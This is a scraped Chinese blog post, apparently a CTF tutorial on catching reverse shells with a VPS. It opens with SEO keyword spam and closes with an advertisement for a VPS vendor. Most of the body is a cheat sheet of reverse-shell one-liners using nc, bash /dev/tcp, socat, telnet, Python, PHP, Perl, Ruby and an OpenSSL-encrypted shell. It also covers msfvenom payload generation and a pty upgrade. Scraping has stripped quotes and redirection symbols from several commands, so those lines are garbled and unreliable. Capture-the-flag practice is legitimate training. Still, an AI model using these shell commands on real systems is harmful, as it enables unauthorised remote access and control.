网站重复,西宁网站建设公司排名,建设银行激活网站,app网站制作本文主要讲解我已知的CTF中对VPS的利用的教程模块#xff0c;所以本篇文章将会持续更新并且有改动 解密base64会解锁新大陆#xff1a;
REvnm77lrpjmlrnnvqTvvJo3MjcwNzcwNTU弹shell
弹shell有很多种类
NC
nc ip port -e /bin/sh
nc -e /bin/sh ip port //这种版…本文主要讲解我已知的CTF中对VPS的利用的教程模块所以本篇文章将会持续更新并且有改动 解密base64会解锁新大陆
REvnm77lrpjmlrnnvqTvvJo3MjcwNzcwNTU弹shell
弹shell有很多种类
NC
nc ip port -e /bin/sh
nc -e /bin/sh ip port //这种版本过老一般都是上面的版本已经兼容了下面的版本了所以上面的命令比较妥当bash重定向
bash -i /dev/tcp/ip:port 01bash -c bash -i /dev/tcp/ip/port 01socat
也是学到了一种新的监听方法
链接
socat tcp-connect:ip:port exec:bash -li,pty,stderr,setsid,sigint,sane
监听
socat TCP-LISTEN:port -Telnet
telnet ip port 0a | /bin/bash 1a然后监听但是由于我的vps并没有开启这样的端口所以刚链接就断开了
还有一种是监听两个端口但是这样子我们得开两个VPS应用 我原先以为可以一次性监听两个端口但是不然而是分先后顺序
telnet ip1 port1 | /bin/bash | telnet ip2 port2
ip1可以和ip2相等但是端口不能最后的结果就是我在ip1的vps上进行了命令执行在ip2看到了回显
也就是相当于自己有个鸡用来进行一些单vps被限制的反弹EXP反弹
而这类反弹就得看有没有相应的环境了
python
python -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ip,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);这里的主要链接功能是socket来完成的而重定向外带是os和subprocess细心的小伙伴发现了这个是不是和ssti注入的反弹差不多呢没错所以其实实际上的EXP是需要我们根据环境来进行改变的
PHP
php -r $sockfsockopen(ip,port);exec(/bin/sh -i 3 3 23);Perl
perl -e use Socket;$iip;$pport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,S);open(STDOUT,S);open(STDERR,S);exec(/bin/sh -i);};Ruby
ruby -rsocket -e cTCPSocket.new(ip,port);while(cmdc.gets);IO.popen(cmd,r){|io|c.print io.read}endruby -rsocket -e exit if fork;cTCPSocket.new(ip,port);while(cmdc.gets);IO.popen(cmd,r){|io|c.print io.read}end看着这么多命令是不是已经眼花缭乱了那么这里推荐一个工具
msfvenom使用
msfvenom -l payloads | grep cmd/unix/reverse看命令目录
msfvenom -p cmd/unix/reverse_python LHOSTip LPORTport -f raw
得到相应命令 得到命令之后自己运行即可
终端衔接
不知道大家发现没有我们弹shell都是那种空白页并没有显示root而且还特别不稳定如果弹shell的时候没有及时断开那么靶场环境可以就得重开了
python -c import pty;pty.spawn(/bin/bash)这个命令可以模拟终端让我们更好的执行命令
OpenSSL
用来反弹加密shell而加密的shell是由我们的RSA来进行加密的
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes生成加密证书 自己一定要填相应信息即使是虚假的 我当时为了省事直接一直按空格然后并不能成功反弹 监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444反弹shell
mkfifo /tmp/s; /bin/sh -i /tmp/s 21 | openssl s_client -quiet -connect ip:port /tmp/s; rm /tmp/s引言
那么看到这里了你是不是会觉得vps在某些特殊环节特别是生活中特别实用呢 那么为了一台好的vps能够在美丽的性能同时还能有同样美丽的价格这是相当难得的而我在不经意之间发现了一个厂商没错他的名字叫做DK盾
DK盾更加人性化他的vps是按需上的你需要什么他就会去准备什么尽量在你的接受时间内完成并且价格也是相当美丽基本就是行业断层级别的碾压 售后服务这是更不用说的如果不好那么全权不能称为是人性化DK师傅产商经营者为了我这种小白是专门建了一个官方交流群其中会不定时送vps以及抽奖红包问答等等实在解决不了问题还可私聊教学 其中也是并无黑幕可以看到我也是中了一台并且租了一台传家宝还有台是与官方进行CTFer赞助计划得到的vps
你想有的相应服务都有CDN vps定制 物理机等等DK官网
若非常感兴趣者可以私聊vps相关问题 一对一教学教你弹
